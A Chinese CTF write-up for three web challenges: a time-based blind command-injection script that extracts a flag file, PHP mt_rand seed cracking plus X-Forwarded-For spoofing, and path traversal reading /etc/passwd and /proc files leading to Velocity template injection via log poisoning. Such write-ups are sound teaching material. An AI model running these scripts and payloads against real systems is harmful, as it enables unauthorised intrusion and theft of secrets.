
2020钓鱼城杯writeup


easyweb

题目环境:存在 PHP 命令执行,但无回显、不出网(无法反弹或外带数据)、web 目录不可写,因此只能借助侧信道(响应时延)把数据带出来。

先用 `php -r "sleep(5)"` 验证:响应明显延时约 5 秒,说明命令确实被执行,时延即可作为唯一的"回显"通道。

获取 /flag.txt(先用 strlen 确认长度为 25,命中则 sleep 5 秒,再逐字符比较):

cmd=php -r "if(strlen(file_get_contents('/flag.txt'))==25){sleep(5);}"


基于时延的逐字符盲注脚本(对每个位置逐个试探可见 ASCII 字符,响应超过 5 秒即视为命中):

import time
import requests
import string
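# Candidate characters for every flag position: printable ASCII 0x21..0x7e.
# Same range as the original Python 2 ``string.maketrans("","")[33:127]`` trick,
# but written so it runs on Python 2 and 3.
CHARSET = [chr(c) for c in range(33, 127)]
TARGET = "http://119.3.37.185/index.php"
FLAG_PATH = "/flag.txt"
FLAG_LEN = 25        # established beforehand: strlen(file_get_contents('/flag.txt'))==25
DELAY = 5            # seconds the target sleeps on a hit
TIMEOUT = DELAY * 4  # hard cap per request so a hung connection cannot stall the loop
# Copied verbatim from the browser request; hoisted out of the loop since it never changes.
HEADERS = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Cache-Control":"no-cache","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0","Connection":"close","Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding":"gzip, deflate","Pragma":"no-cache","Content-Type":"application/x-www-form-urlencoded"}


def build_payload(index, code, flag_path=FLAG_PATH, delay=DELAY):
    """Return the ``cmd`` value that makes the target sleep iff flag[index] has ord() == code.

    The byte is compared as an integer via ord() instead of interpolating the
    character into the PHP string: the original ``=='%s'`` form breaks on quote
    characters (``'``, ``"``, ``\\``, ``$``, backtick) because the payload passes
    through both shell and PHP quoting, which would silently miss those bytes.

    :param index: 0-based position in the flag file
    :param code: candidate byte value (0-255)
    :param flag_path: file to read on the target
    :param delay: seconds the target should sleep on a hit
    :returns: the shell command string sent as the ``cmd`` POST parameter
    """
    return ('php -r "if(ord(substr(file_get_contents(\'%s\'),%d,1))==%d){sleep(%d);}"'
            % (flag_path, index, code, delay))


def char_matches(index, ch):
    """Send one probe and report whether the response took at least DELAY seconds.

    Network latency only adds time, so a real hit is never missed; a false
    positive needs more than DELAY seconds of pure latency, which is unlikely
    with DELAY=5. A timeout (requests.exceptions.Timeout) is left to propagate
    rather than being misread as either outcome.
    """
    started = time.time()
    requests.post(TARGET, data={"cmd": build_payload(index, ord(ch))},
                  headers=HEADERS, timeout=TIMEOUT)
    return time.time() - started >= DELAY


def extract_flag(length=FLAG_LEN, charset=CHARSET, verbose=True):
    """Recover ``length`` bytes of the flag one position at a time.

    Stops probing a position as soon as a character matches (the original
    kept going through the whole charset, wasting ~90 requests per position and
    risking a second, spurious append). If no character matches at some
    position the loop stops instead of skipping it, so the returned prefix is
    never misaligned.

    :returns: the recovered flag prefix (full flag on success)
    """
    flag = ""
    for index in range(length):
        for ch in charset:
            if char_matches(index, ch):
                flag += ch
                break
        else:
            if verbose:
                print("no character matched at position %d, stopping" % index)
            break
        if verbose:
            print(flag)
    return flag


if __name__ == "__main__":
    print(extract_flag())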


flag{kijbvstsbsnsj1d9bc8}

easyseed

index.bak泄露key和lock生成算法


// Leaked from index.bak. Both values come from mt_rand(), PHP's Mersenne Twister:
// it is not a CSPRNG, and every output is a pure function of the (32-bit) seed
// set by mt_srand(). The 6-char $lock is handed to the client in Set-Cookie, which
// gives six known outputs (each mt_rand(0,51) draw pinned to one value) -- enough
// for php_mt_seed to recover the seed and therefore the 16-char $key drawn next
// from the same stream. The charset typos ('j'/'J' missing, 'g'/'G' doubled) are
// part of the target and must be reproduced exactly when re-running this locally.
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');

// Draws $length characters from $chars, one mt_rand(0, strlen($chars)-1) call each.
// Returns the resulting string; the default $chars is never used by the calls above.
function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

响应的 Set-Cookie 中直接给出了 lock 的值,也就是 6 个连续的 mt_rand 输出,这正是恢复 seed 所需的已知输出。


根据 lock 值用 php_mt_seed 爆破 seed:把 lock 每个字符在字符集中的下标转换成 php_mt_seed 的约束格式 `值 值 0 51`(对应 mt_rand(0,51)):

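# The challenge's own alphabet, copied verbatim from index.bak. Note the typos:
# 'j'/'J' are missing and 'g'/'G' occur twice, so the length is still 52 (indices 0..51).
LOCK_CHARSET = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'
OBSERVED_LOCK = 'vEUHaY'


def mt_seed_args(lock, charset=LOCK_CHARSET):
    """Translate an observed lock into php_mt_seed's per-output constraints.

    Each lock character was produced by ``$chars[mt_rand(0, $max)]`` with
    ``$max = strlen($chars) - 1``, so every output becomes the quadruple
    ``value value 0 max`` (exact value observed, then the mt_rand range).

    :param lock: the lock string taken from Set-Cookie
    :param charset: the alphabet the target draws from (order matters)
    :returns: the space-separated argument string for ``php_mt_seed``
    :raises ValueError: if a lock character is not in the charset. The original
        script silently skipped such characters, yielding a misaligned
        argument list and a wrong or empty seed search.

    For the duplicated 'g'/'G' only the first index is used (same as the
    original's first-match loop); if the seed search fails on a lock containing
    them, retry with the second occurrence's index.
    """
    max_index = len(charset) - 1
    parts = []
    for ch in lock:
        idx = charset.find(ch)
        if idx < 0:
            raise ValueError("character %r not in charset" % ch)
        parts.append("%d %d 0 %d" % (idx, idx, max_index))
    return " ".join(parts)


if __name__ == "__main__":
    print(mt_seed_args(OBSERVED_LOCK))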

得到21 21 0 51 30 30 0 51 46 46 0 51 33 33 0 51 0 0 0 51 50 50 0 51

./php_mt_seed 21 21 0 51 30 30 0 51 46 46 0 51 33 33 0 51 0 0 0 51 50 50 0 51

得到两个候选 seed。php_mt_seed 会按 PHP 版本分别给出候选(mt_rand 的实现在 PHP 7.1 改动过),因此需要分别代回生成器验证哪个能复现 lock:


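<?php
// Candidate seeds reported by php_mt_seed for the observed lock. php_mt_seed lists
// candidates per mt_rand() implementation (PHP changed it in 7.1), so which one
// reproduces the lock depends on the PHP version the target runs -- and on the
// version this script is run with. Instead of commenting one line in and out, try
// every candidate and print which one matches.
// NOTE(review): 4007230629 exceeds a signed 32-bit int; this assumes a 64-bit PHP,
// where mt_srand() reduces it to 32 bits internally -- confirm on a 32-bit build.
$candidates = array(718225, 4007230629);
$observed_lock = 'vEUHaY';

// Verbatim copy of the generator leaked in index.bak (charset typos included:
// no 'j'/'J', duplicated 'g'/'G'). It must not be "fixed" or the outputs change.
function random($length, $chars = '0123456789ABC') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}

foreach ($candidates as $seed) {
    mt_srand($seed);
    // Same call order as the target: lock is drawn first, key second, from one stream.
    $lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
    $key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
    $verdict = ($lock === $observed_lock) ? 'MATCH' : 'no match';
    echo "seed=" . $seed . " lock=" . $lock . " key=" . $key . " (" . $verdict . ")\n";
}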

用两个候选 seed 分别重跑生成器,选择能复现 Set-Cookie 中 lock 的那一组 lock、key:

lock=vEUHaY; key=nRtqGR8mtd9ZOPyI;

请求时还需要带上 `X-Forwarded-For: 127.0.0.1`(服务端据此判断来源 IP,可被该头伪造)才能获取 flag。


zblog(完全是队友们做出来的)


发现 title 参数存在路径穿越导致的任意文件读取(原因见后文源码:模板路径直接拼接 title,且模板加载器根目录为 `/`):

http://122.112.253.135/?title=/../../../../../../../etc/passwd


尝试读取 /flag、/flag.txt 均不行。转而读取 /proc/self 目录下的文件来获取当前进程的信息(启动命令、环境变量、打开的文件等)。

从其他师傅博客里看到的fuzz字典:

/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/environ
/proc/version
/proc/cmdline
/proc/self/cwd
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version

在/proc/self/cmdline发现当前运行的web jar包


/home/ctf/web/target/web-1.0-SNAPSHOT-jar-with-dependencies.jar

但是下载不下来

后来发现了关键的源码

/home/ctf/web/src/main/java/Blog.java


import static spark.Spark.*;
import java.io.*;
import org.apache.velocity.Template;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import spark.template.velocity.VelocityTemplateEngine;
import java.io.StringWriter;
public class Blog {
    // Appends `content` to the file `fname` (created if missing); IOExceptions are
    // silently swallowed. Called from the "/" handler with client-influenced content.
    private static void log(String fname, String content) {
        try {
            FileWriter writer = new FileWriter(fname, true);
            writer.write(content);
            writer.close();
        } catch (IOException e) {
        }
    }
    public static void main(String[] arg) {
        staticFiles.location("/public");
        VelocityEngine velocityEngine = new VelocityEngine();
        // File resource loader rooted at "/": any absolute path the process can read
        // is a valid template name, so getTemplate() doubles as an arbitrary file read.
        velocityEngine.setProperty(VelocityEngine.RESOURCE_LOADER, "file");
        velocityEngine.setProperty(VelocityEngine.FILE_RESOURCE_LOADER_PATH, "/");
        velocityEngine.init();
        VelocityContext context = new VelocityContext();
        get("/", (request, response) -> {
            // Creates the session (its id reaches the client in the session cookie).
            request.session(true);
            String title = request.queryParams("title");
            if (title != null) {
                // Log line lands in /tmp/<session id> and contains request.ip() plus the
                // raw title. The ip is client-influenced when X-Forwarded-For is honoured
                // (depends on the deployment -- it was in this challenge), the path is
                // known to the client from its own session cookie, and the write happens
                // before the template lookup, so the log file can be fed back below.
                log("/tmp/" + request.session().id(), "Client IP: " + request.ip() + " -> File: " + title + "\n");
                // No normalisation or allow-list on title: "/../../../../../../../etc/passwd"
                // escapes the templates directory (path traversal -> file read), and the
                // loaded file is rendered by Velocity -- template injection (SSTI) as soon
                // as its contents are attacker-controlled, e.g. the log file above.
                Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/" + title);
                StringWriter sw = new StringWriter();
                template.merge(context, sw);
                return sw;
            }
            // Default page: the fixed "index" template, same rendering path.
            Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/index");
            StringWriter sw = new StringWriter();
            template.merge(context, sw);
            return sw;
        });
    }
}

X-Forwarded-For 头的位置存在 SSTI。原因在源码里:每次带 title 的请求都会把 `Client IP: <request.ip()> -> File: <title>` 追加写入 `/tmp/<session id>`,request.ip() 在该部署下可由 X-Forwarded-For 控制,session id 又在自己的 cookie 里。于是把 Velocity 表达式放进 X-Forwarded-For 发一次请求,再用 `title=/../../../../../../../tmp/<session id>` 让模板引擎去渲染这个日志文件,即可触发模板注入:


可以直接 RCE:直接套用 Apache Solr Velocity 模板注入(CVE-2019-17558)公开的那个 RCE payload(思路是在 Velocity 表达式里通过反射拿到 java.lang.Runtime 执行命令)即可成功:


获取flag

